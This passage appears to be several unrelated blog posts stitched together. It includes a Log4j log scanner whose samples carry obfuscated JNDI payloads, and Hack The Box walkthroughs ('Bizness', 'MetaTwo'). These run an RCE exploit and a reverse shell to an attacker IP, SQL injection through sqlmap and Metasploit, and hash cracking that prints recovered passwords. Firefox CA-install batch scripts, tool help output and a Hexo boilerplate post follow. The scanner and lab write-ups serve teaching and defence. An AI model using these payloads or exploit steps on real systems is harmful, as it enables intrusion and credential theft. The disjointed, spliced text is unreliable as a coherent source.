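# outbound JNDI request when a vulnerable Log4j 2.x logs them. The host is a
# placeholder, not a real indicator.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /" 200 "${jndi:ldap://EXAMPLE-PLACEHOLDER-HOST/a}"',
    '10.0.0.9 - - "GET /" 200 "${${lower:j}ndi:${lower:l}dap://EXAMPLE-PLACEHOLDER-HOST/a}"',
    '10.0.0.9 - - "GET /" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://EXAMPLE-PLACEHOLDER-HOST/b}"',
    '10.0.0.9 - - "GET /" 200 "${jndi:${upper:l}dap://EXAMPLE-PLACEHOLDER-HOST/c}"',
]

# An innermost ${...} lookup: a body with no further $, { or } inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The lookup prefix Log4j hands to its JNDI plugin. Matched case-insensitively
# after normalisation, because ${upper:...} can change the case of "jndi".
JNDI_PREFIX = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_simple_lookup(body):
    """Resolve the lookups a scanner can evaluate without Log4j's runtime context.

    Returns the substituted text, or None for lookups that need runtime state
    (jndi:, env:, sys:, date: ...) and must therefore stay in place.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    # ${key:-default} yields "default" when key is empty or unknown; the
    # degenerate ${::-x} form is just a way of spelling the literal "x".
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=32):
    """Collapse nested simple lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = resolve_simple_lookup(match.group(1))
            if resolved is None:
                return match.group(0)   # leave runtime lookups untouched
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def contains_jndi_lookup(line):
    """True when the line, once normalised, carries a ${jndi:...} lookup."""
    return JNDI_PREFIX.search(normalize(line)) is not None


def flag_suspicious_lines(lines):
    """Return the indexes of the lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if contains_jndi_lookup(line)]


if __name__ == "__main__":
    for i in flag_suspicious_lines(SAMPLE_LOG_LINES):
        print(f"line {i}: {normalize(SAMPLE_LOG_LINES[i])}")
```

Flagging a line is a triage signal for the log source, not a fix: the mitigation stays the upgrade to the versions named above, which disable and then remove the lookup entirely.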
Incident Timeline

```mermaid
timeline
    title Log4j Vulnerability Incident Timeline
    November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache
    December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0)
    December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware
    December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert
    December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack
    December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST
Nmap scan report for bizness.htb (10.129.232.1)
Host is up (0.040s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
443/tcp   open  https
41845/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
```
```bash
echo "10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# update-alternatives --config java
There are 3 choices for the alternative java (providing /usr/bin/java).

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# java --version
openjdk 11.0.20-ea 2023-07-18
OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
```
Start tcpdump:

```bash
sudo tcpdump -i 2 icmp
```
Run the PoC:

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8"
Not Sure Worked or not
```
Check the captured packets:

```
┌──(root@kali)-[/home/h4m5t/Desktop]
└─# tcpdump -i 2 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
21:47:38.693694 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64
21:47:38.693728 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64
21:47:39.695235 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64
21:47:39.695274 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
```
The echo requests arriving from bizness.htb confirm that the RCE works, so the next step is a reverse shell.

First start an nc listener, then run the exploit:

```bash
nc -nlvp 4444
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444
Not Sure Worked or not
```
```
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash
# -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() --
password.encrypt.hash.type=SHA
```
```
cat HashCrypt.java
```

```java
/*******************************************************************************
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 *******************************************************************************/
package org.apache.ofbiz.base.crypto;

    private static boolean doCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) {
        int typeEnd = crypted.indexOf("}");
        String hashType = crypted.substring(1, typeEnd);
        String hashed = crypted.substring(typeEnd + 1);
        MessageDigest messagedigest = getMessageDigest(hashType);
        messagedigest.update(bytes);
        byte[] digestBytes = messagedigest.digest();
        char[] digestChars = Hex.encodeHex(digestBytes);
        String checkCrypted = new String(digestChars);
        if (hashed.equals(checkCrypted)) {
            return true;
        }
        // This next block should be removed when all {prefix}oldFunnyHex are fixed.
        if (hashed.equals(oldFunnyHex(digestBytes))) {
            Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted);
            return true;
        }
        return false;
    }

    /*
     * @deprecated use cryptBytes(hashType, salt, password); eventually, use
     * cryptUTF8(hashType, salt, password) after all existing installs are
     * salt-based.  If the call-site of cryptPassword is just used to create a *new*
     * value, then you can switch to cryptUTF8 directly.
     */
    @Deprecated
    public static String cryptPassword(String hashType, String salt, String password) {
        if (hashType.startsWith("PBKDF2")) {
            return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null;
        }
        return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null;
    }

            messagedigest.update(strBytes);
            return oldFunnyHex(messagedigest.digest());
        } catch (Exception e) {
            Debug.logError(e, "Error while computing hash of type " + hashType, module);
        }
        return str;
    }

    // This next block should be removed when all {prefix}oldFunnyHex are fixed.
    private static String oldFunnyHex(byte[] bytes) {
        int k = 0;
        char[] digestChars = new char[bytes.length * 2];
        for (byte b : bytes) {
            int i1 = b;
```
```
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
```
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbitrary file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─# nmap -sV $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining)
Nmap scan report for 10.129.231.241
Host is up (0.0093s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
```
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain to /etc/hosts.
```
[15:30:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.24, Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:30:38] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
```

```
[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
```
```
   #  Name                                                     Disclosure Date  Rank    Check  Description
   -  ----                                                     ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_bookingpress_category_services_sqli  2022-02-28       normal  Yes    Wordpress BookingPress bookingpress_front_get_category_services SQLi


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli

msf6 > use 0
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb
RHOST => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/
TARGETURI => /events/
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.129.231.241

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================
```

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (manager)
```

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# ftp metapress.htb@$IP
Connected to 10.129.231.241.
220 ProFTPD Server (Debian) [::ffff:10.129.231.241]
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash. Running john then gives an error:

```
Crash recovery file is locked: /root/.john/john.rec
```

Fix:

```bash
rm /root/.john/john.rec
```

Start cracking:

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)
1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
```
COMMANDS:
   webscan, ws        Run a webscan task
   servicescan, ss    Run a service scan task
   subdomain, sd      Run a subdomain task
   poclint, pl, lint  lint yaml poc
   burp-gamma, btg    Convert the export file of burp historical proxy records to POC format
   transform          transform other script to gamma
   reverse            Run a standalone reverse server
   convert            convert results from json to html or from html to json
   genca              GenerateToFile CA certificate and key
   upgrade            check new version and upgrade self if any updates found
   version            Show version info
   x                  A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file.
   help, h            Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --config FILE      Load configuration from FILE (default: "config.yaml")
   --log-level value  Log level, choices are debug, info, warn, error, fatal
   --help, -h         show help
[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml
```

```
OPTIONS:
   --list, -l                                     list plugins
   --plugins value, --plugin value, --plug value  specify the plugins to run, separated by ','
   --poc value, -p value                          specify the poc to run, separated by ','
   --level value                                  specify the level of poc to run, separated by ','
   --tags value                                   specify the level of poc to run, separated by ','

   --listen value                                 use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
   --basic-crawler value, --basic value           use a basic spider to crawl the target and scan the requests
   --browser-crawler value, --browser value       use a browser spider to crawl the target and scan the requests
   --url-file value, --uf value                   read urls from a local file and scan these urls, one url per line
   --burp-file value, --bf value                  read requests from burpsuite exported file as targets
   --url value, -u value                          scan a **single** url
   --data value, -d value                         data string to be sent through POST (e.g. 'username=admin')
   --raw-request FILE, --rr FILE                  load http raw request from a FILE
   --force-ssl, --fs                              force usage of SSL/HTTPS for raw-request

   --json-output FILE, --jo FILE                  output xray results to FILE in json format
   --html-output FILE, --ho FILE                  output xray result to FILE in HTML format
   --webhook-output value, --wo value             post xray result to url in json format
```
```
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml

Enabled plugins: [phantasm]

[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/

[Vuln: phantasm]
Target           "http://example.com/"
VulnType         "poc-yaml-jumpserver-session-replay-unauth/default"
Author           "Chaitin"
Links            ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
```
```
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H
-A              Add a certificate to the database (create if needed)
-E              Add an Email certificate to the database (create if needed)
   -n cert-name      Specify the nickname of the certificate to add
   -t trustargs      Set the certificate trust attributes:
                         p      valid peer
                         P      trusted peer (implies p)
                         c      valid CA
                         T      trusted CA to issue client certs (implies c)
                         C      trusted CA to issue server certs (implies c)
                         u      user cert
                         w      send warning
                         g      make step-up cert
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -a                The input certificate is encoded in ASCII (RFC1113)
   -i input          Specify the certificate file (default is stdin)

-C              Create a new binary certificate from a BINARY cert request
   -c issuer-name    The nickname of the issuer cert
   -i cert-request   The BINARY certificate request file
   -o output-cert    Output binary cert to this file (default is stdout)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension

-G              Generate a new key pair
   -h token-name     Name of token in which to generate key (default is internal)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -g key-size       Key size in bits, (min 512, max 2048, default 1024)
   -y exp            Set the public exponent value (3, 17, 65537) (rsa only)
   -f password-file  Specify the password file
   -z noisefile      Specify the noise file to be used
   -q pqgfile        read PQG value from pqgfile (dsa only)
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-D              Delete a certificate from the database
   -n cert-name      The nickname of the cert to delete
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-U              List all modules
   -d moddir         Module database directory (default is '~/.netscape')
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-K              List all keys
   -h token-name     Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)
   -k key-type       Type of key pair to list ("all", "dsa", "rsa" (default))
   -f password-file  Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-L              List all certs, or print out a single named cert
   -n cert-name      Pretty print named cert (list all if unspecified)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W
   -r                For single cert, print binary DER encoding
   -a                For single cert, print ASCII encoding (RFC1113)

-M              Modify trust attributes of certificate
   -n cert-name      The nickname of the cert to modify
   -t trustargs      Set the certificate trust attributes (see -A above)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-N              Create a new certificate database
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-T              Reset the Key database or token
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -h token-name     Token to reset (default is internal)

-O              Print the chain of a certificate
   -n cert-name      The nickname of the cert to modify
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-R              Generate a certificate request (stdout)
   -s subject        Specify the subject name (using RFC1485)
   -o output-req     Output the cert request to this file
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -f pwfile         Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -a                Output the cert request in ASCII (RFC1113); default is binary

-V              Validate a certificate
   -n cert-name      The nickname of the cert to Validate
   -b time           validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")
   -e                Check certificate signature
   -u certusage      Specify certificate usage:
                         C      SSL Client
                         V      SSL Server
                         S      Email signer
                         R      Email Recipient
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-S              Make a certificate and add to database
   -n key-name       Specify the nickname of the cert
   -s subject        Specify the subject name (using RFC1485)
   -c issuer-name    The nickname of the issuer cert
   -t trustargs      Set the certificate trust attributes (see -A above)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension
```
```batch
@echo off
:: enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set regValue=""

set Value1="checkversion"

rem check whether the new-version registry key exists
reg query %regPath1% >nul 2>nul
echo %errorlevel%
echo !errorlevel!
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        if "%regValue%"=="" (
            echo value not exists
        ) else (
            set Value1=%%b
        )
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem check whether the old-version registry path exists
    rem ("rem" rather than "::" here: "::" inside a parenthesised block breaks the block)
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            if "%regValue%"=="" (
                echo value not exists
            ) else (
                set Value1=%%b
            )
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )
    echo !Value1!
    echo %Value1%
    set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
    echo Majorold: %Major%
)

echo !Value1!
echo %Value1%

rem split "a.b.c.d" into Major/Minor/Revision/Subrev by replacing each "." with a set /A step
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem check the version number (Major is 0 when no registry key was found and Value1 fell back to 0.0.0)
if %Major% EQU 0 (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)

rem exit the script
exit /b

:function1
echo Program version is less than 49. Executing function 1...
rem function 1: for Firefox below version 49, update the cert8.db certificate store.

rem show the existing certificates in the db
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set default_name=""
rem check whether the certificate database path exists
IF EXIST %db_path% (
    echo default_path exists
    rem add the commands to run here
    set "count=0"
    for /d %%i in ("%db_path%\*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem check that *.default is the only profile folder
    if !count! equ 1 (
        set default_name=!folder!
        set "all_path=%db_path%!default_name!"
        rem show the full path of the default folder
        echo !all_path!
        rem show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
        rem update the certificate store
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!
        rem show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem function 2: for Firefox 49 and above, enable security.enterprise_roots.enabled

set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg
set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg%" (
        copy "%source_file_cfg%" "%dest_dir_cfg%"
    ) else (
        echo Directory %dest_dir_cfg% does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg_x86%" (
        copy "%source_file_cfg%" "%dest_dir_cfg_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set source_file_js=C:\firefoxinstallcert\local-settings.js
set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js%" (
        copy "%source_file_js%" "%dest_dir_js%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)

set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js_x86%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js_x86%" (
        copy "%source_file_js%" "%dest_dir_js_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)
```
@echo off
rem Enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set Value1="checkversion"

rem Check whether the new-version registry key exists
reg query %regPath1% >nul 2>nul
echo %errorlevel%
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        set Value1=%%b
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem Check whether the old-version registry path under WOW6432Node exists
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            set Value1=%%b
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )
    echo !Value1!
)

rem Value1 is only usable here, after the block: %Value1% inside the block expands at parse time
echo !Value1!
echo %Value1%
rem Split "a.b.c.d" into Major/Minor/Revision/Subrev: the ":.=" substitution turns each dot into "& set /A ..."
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem Check the version number; Major is 0 when neither registry key was found
if %Major% EQU 0 (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)
rem Exit the script
exit /b
:function1
echo Program version is less than 49. Executing function 1...
rem Function 1: below version 49, update the cert8.db certificate store
rem Show the certificates already in the db
rem Comments inside if/for blocks use rem because :: is really a label and is unsafe there
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set "default_name="
rem Check whether the certificate database path exists
IF EXIST "%db_path%" (
    echo default_path exists
    rem Commands to run go here
    set "count=0"
    for /d %%i in ("%db_path%*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem Check that *.default is the only profile folder
    if !count! equ 1 (
        set "default_name=!folder!"
        set "all_path=%db_path%!default_name!"
        rem Show the full path of the default profile folder
        echo !all_path!
        rem Show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d "!all_path!"
        rem Add the certificate to the store
        rem Trust flags: "u,u,u" marks a user certificate; a CA trusted to issue TLS server certs needs "C,," instead
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d "!all_path!"
        rem Show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d "!all_path!"
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof
:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem Function 2: on Firefox 49 and later, enable security.enterprise_roots.enabled by adding a user.js to the profile
rem Default profiles directory
set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"
rem Look for the folder whose name contains "default", i.e. the profile folder
set "searchString=default"
set "source_user_js=C:\firefoxinstallcert\user.js"
rem Copy user.js into the profile folder
IF EXIST "%parentFolder%" (
    for /d %%F in ("%parentFolder%\*") do (
        echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1
        if errorlevel 1 (
            echo default Folder not found.
        ) else (
            echo default Folder found.
            rem Build the full path
            set "all_default_path=%parentFolder%\%%~nxF"
            echo !all_default_path!
            copy "%source_user_js%" "!all_default_path!"
        )
    )
) ELSE (
    echo no
)
goto :eof
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
graph LR
    A[Attacker crafts malicious payload with JNDI lookup] --> C{Log4j parses: Contains JNDI lookup?}
    C -->|Yes| D[Execute JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to attacker's server]
    F --> G[Download & execute malicious class]
    G --> H[Attacker gains server control]
    classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px;
    classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px;
    classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px;
    classDef danger fill:#ffebee,stroke:#333,stroke-width:1px;
    class A,H highlight;
    class C decision;
